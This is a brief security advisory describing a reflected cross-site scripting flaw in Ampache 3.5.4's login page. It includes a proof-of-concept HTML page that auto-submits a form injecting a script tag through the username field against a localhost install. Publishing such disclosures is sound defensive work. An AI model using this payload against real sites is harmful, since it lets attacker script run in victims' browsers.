Home
Consulting
Advisories
Software
Articles
Contact

Ampache 3.5.4 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Ampache 3.5.4 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/ampache-3.5.4/login.php">
            <input type="hidden" name="username" value=""><script>alert(0)</script>" />   
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC